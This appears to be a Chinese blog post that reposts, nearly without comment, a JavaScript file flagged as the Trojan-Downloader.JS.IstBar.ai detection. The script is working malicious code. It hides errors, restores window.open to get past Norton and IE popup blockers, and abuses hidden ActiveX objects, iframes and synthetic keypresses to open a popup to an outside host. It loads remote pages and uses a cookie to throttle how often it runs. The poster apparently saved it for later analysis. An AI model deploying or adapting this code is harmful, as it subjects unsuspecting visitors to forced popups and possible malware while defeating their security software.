![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
//detected: Trojan program Trojan-Downloader.JS.IstBar.ai URL: http://www.ffkan.com/js/newsp2.js
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
var paypopupURL = "http://www.m117.cn/?f";
var usingActiveX = true;
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function blockError()
{return true;}
window.onerror = blockError;
//bypass norton internet security popup blocker
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
if (window.SymRealWinOpen)
{window.open = SymRealWinOpen;}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
if (window.NS_ActualOpen)
{window.open = NS_ActualOpen;}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
if (typeof(usingClick) == 'undefined')
{var usingClick = false;}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
if (typeof(usingActiveX) == 'undefined')
{var usingActiveX = false;}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
if (typeof(popwin) == 'undefined')
{var popwin = null;}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
if (typeof(poped) == 'undefined')
{var poped = false;}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
var blk = 1;
var setupClickSuccess = false;
var googleInUse = false;
var myurl = location.href+'/';
var MAX_TRIED = 20;
var activeXTried = false;
var tried = 0;
var randkey = '0'; // random key from server
var myWindow;
var popWindow;
var setupActiveXSuccess = 0;
// bypass IE functions
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function setupActiveX()
{if (usingActiveX)
{try
{if (setupActiveXSuccess < 5)
{document.write('<DIV STYLE="display:none;"><INPUT ID="autoHit" TYPE="TEXT" ONKEYPRESS="showActiveX()"></DIV>');
popWindow=window.createPopup();
popWindow.document.body.innerHTML='<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="http://www.resume-cn.com/firefox.htm" TYPE="text/html"></OBJECT></DIV>'; // error page
document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" src="/about:blank"></IFRAME>');
popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="http://www.resume-cn.com/firefox.htm" TYPE="text/html"></OBJECT>'); // error page
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
setupActiveXSuccess = 6;}}catch(e)
{if (setupActiveXSuccess < 5)
{setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5)
{activeXTried = true;setupClick();}}}}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function tryActiveX()
{
if (!activeXTried && !poped)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;
}
else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
myWindow=popIframe.getParentFrame.object.parentWindow;
popIframe.location.replace('about:blank');
}
else
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{setTimeout('tryActiveX()',200);
tried++;
if (tried >= MAX_TRIED && !activeXTried)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
activeXTried = true;
setupClick();}return;
}
openActiveX();
window.windowFired=true;self.focus();
}
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
function openActiveX()
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedBlock.gif)
{
if (!activeXTried && !poped)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
if (myWindow && window.windowFired)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
window.windowFired=false;
document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));
}
else
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
setTimeout('openActiveX();',100);
}
tried++;
if (tried >= MAX_TRIED)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{activeXTried = true;setupClick();
}
}
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
function showActiveX()
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedBlock.gif)
{
if (!activeXTried && !poped)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if (googleInUse)
{
window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);
window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);
}
newWindow=myWindow.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if (newWindow)
{newWindow.blur();self.focus();activeXTried = true;poped = true;}else
{if (!googleInUse)
{googleInUse=true;tried=0;tryActiveX();}else
{activeXTried = true;setupClick();}}}}
// end bypass IE functions
// normal call functions
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function paypopup()
{if (!poped)
{if(!usingClick && !usingActiveX)
{
popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if (popwin)
{poped = true;}self.focus();}}if (!poped)
{if (usingActiveX)
{tryActiveX();}else
{setupClick();}}}
// end normal call functions
// onclick call functions
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function setupClick()
{if (!poped && !setupClickSuccess)
{if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function gopop()
{
if (!poped)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if (popwin)
{poped = true;}self.focus();}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if (typeof(prePaypopOnclick) == "function")
{prePaypopOnclick();}}
// end onclick call functions
// check version
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function detectGoogle()
{if (usingActiveX)
{try
{document.write('<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e)
{setTimeout('detectGoogle();',50);}}}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function version()
{
var os = 'W0';
var bs = 'I0';
var isframe = false;
var browser = window.navigator.userAgent;
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if (browser.indexOf('Win') != -1)
{os = 'W1';}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if (browser.indexOf("SV1") != -1)
{bs = 'I2';}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
else if (browser.indexOf("Opera") != -1)
{bs = "I0";}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
else if (browser.indexOf("Firefox") != -1)
{bs = "I0";}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1)
{bs = 'I1';}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if (top.location != this.location)
{isframe = true;}
paypopupURL = paypopupURL;
usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
version();
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
// end check version
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function loadingPop()
{
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if(!usingClick && !usingActiveX)
{
paypopup();
}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
else if (usingActiveX)
{tryActiveX();}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
else
{setupClick();}
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
//\\\\\\\\\\\\\\
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function GetCookie (name)
{
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
while (i < clen)
{
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function SetCookie (name, value)
{
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function DeleteCookie (name)
{
var exp = new Date();
exp.setTime (exp.getTime() - 1);
// This cookie is history
var cval = 0;
document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
}
//设置cookies时间,自己根据情况设置。
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*6*60*60*1000));
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function amt()
{
var count = GetCookie('countsports'); //同一ip只显示一次
//var count;//同一ip只显示N次
//alert(count);
//count = null;
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if(count == null)
{
SetCookie('countsports','1')
return 1
}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
else
{
var newcount = parseInt(count) + 1;
if(newcount<2) count=1;
SetCookie('countsports',newcount,exp);
//DeleteCookie('countsports')
return newcount
}
}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function getCookieVal(offset)
{
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function btpop()
{
if(amt()==1)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
openWindowBack();
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
try
{
aryADSeq.push("openWindowBack()");
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
}catch(e)
{
openWindowBack();
}
}
}
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
function openWindowBack()
{
myurl = myurl.substring(0, myurl.indexOf('/',8));
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
if (myurl == '')
{myurl = '.';}
setupActiveX();
loadingPop();
//self.focus();
}
btpop()
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
有时间分析一下
QQ:273352165
evlon#126.com
转载请注明出处。